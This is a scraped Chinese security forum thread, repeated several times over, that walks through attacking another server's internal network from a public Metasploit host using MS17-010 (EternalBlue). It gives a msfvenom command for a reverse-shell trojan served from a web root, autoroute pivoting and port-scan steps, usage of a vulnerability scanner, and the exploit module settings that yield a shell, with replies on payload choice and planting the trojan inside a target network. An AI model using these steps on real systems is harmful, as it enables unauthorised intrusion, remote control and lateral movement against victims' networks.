用户
搜索
  • TA的每日心情

    2017-5-28 08:43
  • 签到天数: 4 天

    连续签到: 1 天

    [LV.2]偶尔看看

    安全团队

    会是一回事,用又是一回事。

    Rank: 7Rank: 7Rank: 7

    85

    主题

    276

    帖子

    4236

    魔法币
    收听
    0
    粉丝
    51
    注册时间
    2016-9-4

    i春秋认证i春秋签约作者

    诚殷网络论坛 安全团队 会是一回事,用又是一回事 i春秋认证 i春秋签约作者 楼主
    发表于 2018-5-14 12:40:18 19715613
    本帖最后由 诚殷网络论坛 于 2018-5-14 05:06 编辑
    前言

    其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。


    准备工作

    1.安装了Msf的公网主机+Ubuntu系统

    2.一台其他服务器内网存在445漏洞

    3.细心,细心,细心,钻研,钻研!!!

    开始第一步:公网主机操作

    生成msf木马:

    [AppleScript] 纯文本查看 复制代码
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe

    Msf监听端口:6666


    可以看到,图中获取到了shell!


    添加路由


    第一步:run get_local_subnets (获取当前路由)


    第二步:run autoroute -s 192.168.3.0/24 (添加路由)


    第三步:run autoroute -p (查看已添加路由)



    使用Payload进行攻击


    第一步:background(转换到后台)


    第二步:use scanner/portscan/tcp (先扫描开放445端口的PC)


    第三步:exploit(开始扫描)

    .


    注意:扫描出来开放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)


    如何列出那些存在445漏洞的PC?

    下载:

    游客,如果您要查看本帖隐藏内容请回复

    描述:

    工具的使用步骤如下:
    解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
    -ip参数可以指定IP扫描,同时支持IP段扫描:
    MS_17_010_Scan.exe -ip 192.168.44.129
    MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
    -file参数支持从文件读取IP列表进行扫描:
    MS_17_010_Scan.exe -file ip.txt
    工具将显示检测结果:如不存在风险将显示NOT Found Vuln,如存在风险将显示Found Vuln MS17-010及目标电脑的操作系统版本,如果IP地址无效或者漏洞端口未开则显示Exception。
    输出结果同时保存在当前目录的result.txt中。

    上面的工具也可以在webshell中使用,只需要把结果输出到 txt文档中即可。(例如:MS_17_010_Scan.exe -ip 192.168.44.129 >>jieguo.txt)


    攻击正式开始


    第一步:use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块)

    第二步:set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP)

    第三步:exploit(执行攻击)

    第四步:攻击完成,并且自动返回一个shell控制台(如下图)


    广告一波:诚殷网络第十九期WEB基础培训要开始了,特别适合:小白,初学者,以及刚学不久的童鞋,各位请看下面:


         培训详情:http://url.cn/5dOeWfl
    参加WEB安全培训,请滴滴我哟!或者联系邮箱:admin@chinacycc.com(只要君信我,定当不负君!)
    ColorImageLinkQuoteCodeSmilies@朋友

    本版积分规则参与/回复主题
    每日精选文章版块列表mn_forum mn_forum热门话题/问答推荐文章专辑广播大厅i春秋学院快捷导航
    看我的
    i春秋社区-分享你的技术,为安全加点温度

    请输入搜索内容
    帖子
    搜索
    版块列表›(现金奖励)投稿请加QQ320229344›白帽子技术/思路›查看内容
    发帖
    补天专题
    i春秋签约作家

    Binghe

    penguin_wwy

    野驴

    ohlinge

    zusheng

    sucppVK

    MAX丶

    icq8756c1a2

    immenma

    icq6a70641f

    添潮

    wangxiulin
    [思路/技术] 利用公网Msf+MS17010跨网段攻击内网(不详细立马关站) heatlevel

    诚殷网络论坛 安全团队会是一回事,用又是一回事i春秋认证i春秋签约作者
    发表于 2018-5-14 12:40:18 19515545
    本帖最后由 诚殷网络论坛 于 2018-5-14 05:06 编辑

    前言

    其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。

    准备工作

    1.安装了Msf的公网主机+Ubuntu系统
    2.一台其他服务器内网存在445漏洞
    3.细心,细心,细心,钻研,钻研!!!
    开始第一步:公网主机操作

    生成msf木马:
    [AppleScript] 纯文本查看 复制代码
    ?
    1
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe
    Msf监听端口:6666


    可以看到,图中获取到了shell!

    添加路由

    第一步:run get_local_subnets (获取当前路由)


    第二步:run autoroute -s 192.168.3.0/24 (添加路由)


    第三步:run autoroute -p (查看已添加路由)



    使用Payload进行攻击

    第一步:background(转换到后台)


    第二步:use scanner/portscan/tcp (先扫描开放445端口的PC)


    第三步:exploit(开始扫描)
    .

    注意:扫描出来开放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)

    如何列出那些存在445漏洞的PC?
    下载:
    看我的,如果您要查看本帖隐藏内容请回复
    描述:
    工具的使用步骤如下:
    解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
    -ip参数可以指定IP扫描,同时支持IP段扫描:
    MS_17_010_Scan.exe -ip 192.168.44.129
    MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
    -file参数支持从文件读取IP列表进行扫描:
    MS_17_010_Scan.exe -file ip.txt
    工具将显示检测结果:如不存在风险将显示NOT Found Vuln,如存在风险将显示Found Vuln MS17-010及目标电脑的操作系统版本,如果IP地址无效或者漏洞端口未开则显示Exception。
    输出结果同时保存在当前目录的result.txt中。

    上面的工具也可以在webshell中使用,只需要把结果输出到 txt文档中即可。(例如:MS_17_010_Scan.exe -ip 192.168.44.129 >>jieguo.txt)

    攻击正式开始

    第一步:use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块)
    第二步:set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP)
    第三步:exploit(执行攻击)
    第四步:攻击完成,并且自动返回一个shell控制台(如下图)


    广告一波:诚殷网络第十九期WEB基础培训要开始了,特别适合:小白,初学者,以及刚学不久的童鞋,各位请看下面:

         培训详情:http://url.cn/5dOeWfl
    本主题由 坏蛋 于 2018-5-14 15:15 生成文章
    新鲜发帖HCSRC中秋活动
    [招聘专版] 长亭招人[白帽子技术/思路] LOL昵称查QQ[热门话题/问答] 360安全大脑亮相国家网络安全宣传周 展示五大应用场景[白帽子技术/思路] 手把手教你如何用py编写C段批量扫描器[安全教程/书籍分享] 诚殷网络第十九期培训-六天全集[白帽子技术/思路] 记一次考试网渗透测试[白帽子技术/思路] 安全狗从安装到卸载[四]:过狗注入[白帽子技术/思路] YxCMS 1.4.7 最新版漏洞分析[安全教程/书籍分享] An Intensive Introduction to Cryptography新鲜跟帖【招募啦】360企业安全集团,招募季强势来临!
    [白帽子技术/思路] 定做一个自己的python漏洞库[白帽子技术/思路] 手把手教你如何用py编写C段批量扫描器[安全教程/书籍分享] 诚殷网络第十九期培训-六天全集[课程学习中心] 【心跳开学季】9.10-10.10,满额换好礼,学习有激励,唤醒学力,一起嗨![白帽子技术/思路] 手机号转QQ号等[白帽子技术/思路] 多个百度手机号穷举接口与身份证穷举接口的抓取利用教程[安全教程/书籍分享] 实战研究绕过安全狗全过程(时长5小时)[热门话题/问答] RDP 3389 登陆 疑难杂症[白帽子技术/思路] 记一次对某站点的渗透测试
    5
    评分评分

    转播转播

    分享分享

    分享淘帖
    分享至 Q空间 7 人收藏 参加WEB安全培训,请滴滴我哟!或者联系邮箱:[email]admin@chinacycc.com[/email](只要君信我,定当不负君!)
    使用道具 举报 回复

    无菌牛奶 i春秋-脚本小子 推荐
    发表于 2018-8-24 14:32:02
    工具的使用步骤如下:
    解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
    -ip参数可以指定IP扫描,同时支持IP段扫描:
    MS_17_010_Scan.exe -ip 192.168.44.129
    MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
    -file参数支持从文件读取IP列表进行扫描:
    MS_17_010_Scan
    使用道具 举报 回复
    ColorImageLinkQuoteCodeSmilies@朋友

    本版积分规则参与/回复主题
    每日精选文章版块列表mn_forum mn_forum热门话题/问答推荐文章专辑广播大厅i春秋学院快捷导航
    看我的
    i春秋社区-分享你的技术,为安全加点温度

    请输入搜索内容
    帖子
    搜索
    版块列表›(现金奖励)投稿请加QQ320229344›白帽子技术/思路›查看内容
    发帖
    补天专题
    i春秋签约作家

    Binghe

    penguin_wwy

    野驴

    ohlinge

    zusheng

    sucppVK

    MAX丶

    icq8756c1a2

    immenma

    icq6a70641f

    添潮

    wangxiulin
    [思路/技术] 利用公网Msf+MS17010跨网段攻击内网(不详细立马关站) heatlevel

    诚殷网络论坛 安全团队会是一回事,用又是一回事i春秋认证i春秋签约作者
    发表于 2018-5-14 12:40:18 19515545
    本帖最后由 诚殷网络论坛 于 2018-5-14 05:06 编辑

    前言

    其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。

    准备工作

    1.安装了Msf的公网主机+Ubuntu系统
    2.一台其他服务器内网存在445漏洞
    3.细心,细心,细心,钻研,钻研!!!
    开始第一步:公网主机操作

    生成msf木马:
    [AppleScript] 纯文本查看 复制代码
    ?
    1
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe
    Msf监听端口:6666


    可以看到,图中获取到了shell!

    添加路由

    第一步:run get_local_subnets (获取当前路由)


    第二步:run autoroute -s 192.168.3.0/24 (添加路由)


    第三步:run autoroute -p (查看已添加路由)



    使用Payload进行攻击

    第一步:background(转换到后台)


    第二步:use scanner/portscan/tcp (先扫描开放445端口的PC)


    第三步:exploit(开始扫描)
    .

    注意:扫描出来开放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)

    如何列出那些存在445漏洞的PC?
    下载:
    看我的,如果您要查看本帖隐藏内容请回复
    描述:
    工具的使用步骤如下:
    解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
    -ip参数可以指定IP扫描,同时支持IP段扫描:
    MS_17_010_Scan.exe -ip 192.168.44.129
    MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
    -file参数支持从文件读取IP列表进行扫描:
    MS_17_010_Scan.exe -file ip.txt
    工具将显示检测结果:如不存在风险将显示NOT Found Vuln,如存在风险将显示Found Vuln MS17-010及目标电脑的操作系统版本,如果IP地址无效或者漏洞端口未开则显示Exception。
    输出结果同时保存在当前目录的result.txt中。

    上面的工具也可以在webshell中使用,只需要把结果输出到 txt文档中即可。(例如:MS_17_010_Scan.exe -ip 192.168.44.129 >>jieguo.txt)

    攻击正式开始

    第一步:use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块)
    第二步:set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP)
    第三步:exploit(执行攻击)
    第四步:攻击完成,并且自动返回一个shell控制台(如下图)


    广告一波:诚殷网络第十九期WEB基础培训要开始了,特别适合:小白,初学者,以及刚学不久的童鞋,各位请看下面:

         培训详情:http://url.cn/5dOeWfl
    本主题由 坏蛋 于 2018-5-14 15:15 生成文章
    新鲜发帖HCSRC中秋活动
    [招聘专版] 长亭招人[白帽子技术/思路] LOL昵称查QQ[热门话题/问答] 360安全大脑亮相国家网络安全宣传周 展示五大应用场景[白帽子技术/思路] 手把手教你如何用py编写C段批量扫描器[安全教程/书籍分享] 诚殷网络第十九期培训-六天全集[白帽子技术/思路] 记一次考试网渗透测试[白帽子技术/思路] 安全狗从安装到卸载[四]:过狗注入[白帽子技术/思路] YxCMS 1.4.7 最新版漏洞分析[安全教程/书籍分享] An Intensive Introduction to Cryptography新鲜跟帖【招募啦】360企业安全集团,招募季强势来临!
    [白帽子技术/思路] 定做一个自己的python漏洞库[白帽子技术/思路] 手把手教你如何用py编写C段批量扫描器[安全教程/书籍分享] 诚殷网络第十九期培训-六天全集[课程学习中心] 【心跳开学季】9.10-10.10,满额换好礼,学习有激励,唤醒学力,一起嗨![白帽子技术/思路] 手机号转QQ号等[白帽子技术/思路] 多个百度手机号穷举接口与身份证穷举接口的抓取利用教程[安全教程/书籍分享] 实战研究绕过安全狗全过程(时长5小时)[热门话题/问答] RDP 3389 登陆 疑难杂症[白帽子技术/思路] 记一次对某站点的渗透测试
    5
    评分评分

    转播转播

    分享分享

    分享淘帖
    分享至 Q空间 7 人收藏 参加WEB安全培训,请滴滴我哟!或者联系邮箱:[email]admin@chinacycc.com[/email](只要君信我,定当不负君!)
    使用道具 举报 回复

    无菌牛奶 i春秋-脚本小子 推荐
    发表于 2018-8-24 14:32:02
    工具的使用步骤如下:
    解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
    -ip参数可以指定IP扫描,同时支持IP段扫描:
    MS_17_010_Scan.exe -ip 192.168.44.129
    MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
    -file参数支持从文件读取IP列表进行扫描:
    MS_17_010_Scan
    使用道具 举报 回复
    工具的使用步骤如下:
    解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
    -ip参数可以指定IP扫描,同时支持IP段扫描:
    MS_17_010_Scan.exe -ip 192.168.44.129
    MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
    -file参数支持从文件读取IP列表进行扫描:
    MS_17_010_Scan.exe -file ip.txt
    使用道具 举报 回复
    工具的使用步骤如下:
    解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。
    -ip参数可以指定IP扫描,同时支持IP段扫描:
    MS_17_010_Scan.exe -ip 192.168.44.129
    MS_17_010_Scan.exe -ip 192.168.44.129 192.168.44.133
    -file参数支持从文件读取IP列表进行扫描:
    MS_17_010_Scan.exe -file ip.txt
    使用道具 举报 回复
    诚殷网络论坛 安全团队 会是一回事,用又是一回事 i春秋认证 i春秋签约作者
    推荐
    发表于 2018-5-15 12:25:29
    大木瓜 发表于 2018-5-15 03:30
    想问一下 那个exe 是上传到内网机器中 然后扫描的吗  还是在ubantu中搭建运行exe的环境 ...

    如果你的机器不在内网,那么就需要传木马到他内网中一台机器,如果在,那么就直接调用ms17010模块
    参加WEB安全培训,请滴滴我哟!或者联系邮箱:admin@chinacycc.com(只要君信我,定当不负君!)
    使用道具 举报 回复


    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    使用道具 举报 回复
    发表于 2018-5-29 22:13:23

    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    使用道具 举报 回复
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    谢谢分享
    使用道具 举报 回复
    发表于 2018-5-14 13:50:01
    学习学习~~~~~
    使用道具 举报 回复
    发表于 2018-5-14 15:02:26
    win7 32位的怎么打
    使用道具 举报 回复
    发表于 2018-5-14 15:27:35
    利用公网Msf+MS17010跨网段攻击内网
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    很不错的干货呀
    使用道具 举报 回复
    发表于 2018-5-14 15:45:24
    我想问下,如果挂了代理 ,lhost 该是 代理ip 还是 本机ip呢?
    使用道具 举报 回复
    诚殷网络论坛 安全团队 会是一回事,用又是一回事 i春秋认证 i春秋签约作者
    15#
    发表于 2018-5-14 16:00:18
    Fox丶 发表于 2018-5-14 07:45
    我想问下,如果挂了代理 ,lhost 该是 代理ip 还是 本机ip呢?

    后面写
    参加WEB安全培训,请滴滴我哟!或者联系邮箱:admin@chinacycc.com(只要君信我,定当不负君!)
    使用道具 举报 回复
    诚殷网络论坛 安全团队 会是一回事,用又是一回事 i春秋认证 i春秋签约作者
    16#
    发表于 2018-5-14 16:01:28
    mozas 发表于 2018-5-14 07:02
    win7 32位的怎么打

    set payload windows/meterpreter/reverse_tcp
    set payload windows/x64/meterpreter/reverse_tcp
    选择不同的payload即可。
    参加WEB安全培训,请滴滴我哟!或者联系邮箱:admin@chinacycc.com(只要君信我,定当不负君!)
    使用道具 举报 回复
    发表于 2018-5-14 17:00:41
    6666666666666
    使用道具 举报 回复
    发表于 2018-5-14 17:03:48
    围观大佬
    使用道具 举报 回复
    围观大佬
    使用道具 举报 回复
    发表于 2018-5-14 18:47:06

    win7 32位的怎么打
    使用道具 举报 回复
    发表于 2018-5-14 19:15:14
    学习大哥操作
    使用道具 举报 回复
    发表于 2018-5-14 19:26:44
    666666666666666
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册